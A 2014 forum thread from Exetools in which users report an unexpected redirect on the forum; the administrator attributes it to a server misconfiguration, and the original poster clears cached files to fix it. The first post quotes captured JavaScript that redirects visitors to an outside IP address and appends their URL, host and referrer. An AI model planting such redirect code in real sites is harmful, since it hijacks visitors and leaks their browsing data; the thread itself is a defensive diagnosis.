Exetools  

Go Back   Exetools > General > General Discussion

Notices

Reply
 
Thread Tools Display Modes
  #1  
Old 04-30-2014, 03:56
RedBlkJck RedBlkJck is offline
Family
 
Join Date: Oct 2011
Posts: 99
Rept. Given: 64
Rept. Rcvd 80 Times in 43 Posts
Thanks Given: 25
Thanks Rcvd at 11 Times in 9 Posts
RedBlkJck Reputation: 80
Site: Injected/Redirected?

Anyone else getting a site redirect? Started last night. I am getting random redirect upon connecting to the forum using Chrome browser and clicking for NewPost. Firefox does not seem to be doing it, probably blocking the java script.
Did a packet capture and there are no requests originating local. DNS request look good. Here is what is returned back to the browser request.
Code:
http://202.102.110.207:8080/1.htm?AIMT=http://forum.exetools.com/search.php?do=getnew&host=forum.exetools.com&refer=&server=105&pre=1398799069638
this is the code generated after clicking NewPosts
Code:
<html><head></head><script type="text/javascript"> 
var sa = "http://202.102.110.207:8080/"; var pp = "105&pre="+(new Date()).getTime(); 
var s=String(window.location.href); var host=escape(s.substring(7,s.indexOf('/',7))); 
var ref=escape(document.referrer); var su = s+"&host="+host+"&refer="+ref+"&server="+pp;
s = escape(s); function loadfr(){ document.getElementById("fr1").src = sa+"3.htm?AIMT="+su; }
function refreshPage(){ document.location = sa+"2.htm?AIMT="+su; }
if (self.location == top.location){ document.location= sa+"1.htm?AIMT="+su; }
else { refreshPage(); }</script><frameset rows="*,0"><frame id="main" src="">
<frame id="fr1" src=""></frameset><body></body></html>
Reply With Quote
  #2  
Old 04-30-2014, 04:13
The Old Pirate The Old Pirate is offline
Family
 
Join Date: Sep 2005
Posts: 120
Rept. Given: 51
Rept. Rcvd 73 Times in 22 Posts
Thanks Given: 9
Thanks Rcvd at 18 Times in 10 Posts
The Old Pirate Reputation: 73
I confirm it. WTF? Forum hacked?
__________________

http://youtu.be/H0QfVDebLFg
Reply With Quote
The Following User Gave Reputation+1 to The Old Pirate For This Useful Post:
RedBlkJck (04-30-2014)
  #3  
Old 04-30-2014, 09:06
uel888 uel888 is offline
Friend
 
Join Date: May 2011
Posts: 44
Rept. Given: 171
Rept. Rcvd 5 Times in 3 Posts
Thanks Given: 245
Thanks Rcvd at 10 Times in 8 Posts
uel888 Reputation: 5
Same experience my friend :-)
Reply With Quote
  #4  
Old 04-30-2014, 09:36
ZeNiX's Avatar
ZeNiX ZeNiX is offline
Administrator
 
Join Date: Feb 2009
Posts: 732
Rept. Given: 177
Rept. Rcvd 773 Times in 259 Posts
Thanks Given: 213
Thanks Rcvd at 885 Times in 242 Posts
ZeNiX Reputation: 700-899 ZeNiX Reputation: 700-899 ZeNiX Reputation: 700-899 ZeNiX Reputation: 700-899 ZeNiX Reputation: 700-899 ZeNiX Reputation: 700-899 ZeNiX Reputation: 700-899
There has been a wrong configuration on the server.
Problem should have been solved yesterday.
Reply With Quote
The Following User Gave Reputation+1 to ZeNiX For This Useful Post:
Jhonjhon_123 (05-01-2014)
  #5  
Old 04-30-2014, 21:44
RedBlkJck RedBlkJck is offline
Family
 
Join Date: Oct 2011
Posts: 99
Rept. Given: 64
Rept. Rcvd 80 Times in 43 Posts
Thanks Given: 25
Thanks Rcvd at 11 Times in 9 Posts
RedBlkJck Reputation: 80
Quote:
Originally Posted by ZeNiX View Post
There has been a wrong configuration on the server.
Problem should have been solved yesterday.
Ah, ok. I found static files stored in the cache for the search function urls like getnew.htm. These needed to be cleared from the cache. Now the site loads as normal. FireFox was a clean install, so that's why no issues. Fixed. Thx. - jack
Reply With Quote
  #6  
Old 04-30-2014, 22:12
AlexAltea AlexAltea is offline
Friend
 
Join Date: Apr 2014
Posts: 16
Rept. Given: 0
Rept. Rcvd 8 Times in 5 Posts
Thanks Given: 0
Thanks Rcvd at 0 Times in 0 Posts
AlexAltea Reputation: 8
Damn, I was using IE on a non-updated machine (my fault, I know), and I got totally paranoid thinking I could have get pwned with CVE-2014-1776.
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Site down? nikre General Discussion 31 09-13-2018 19:24
Site for New Books Zaltekk General Discussion 25 02-22-2018 19:16


All times are GMT +8. The time now is 10:38.


Always Your Best Friend: Aaron, JMI, ahmadmansoor, ZeNiX, chessgod101
( 1998 - 2024 )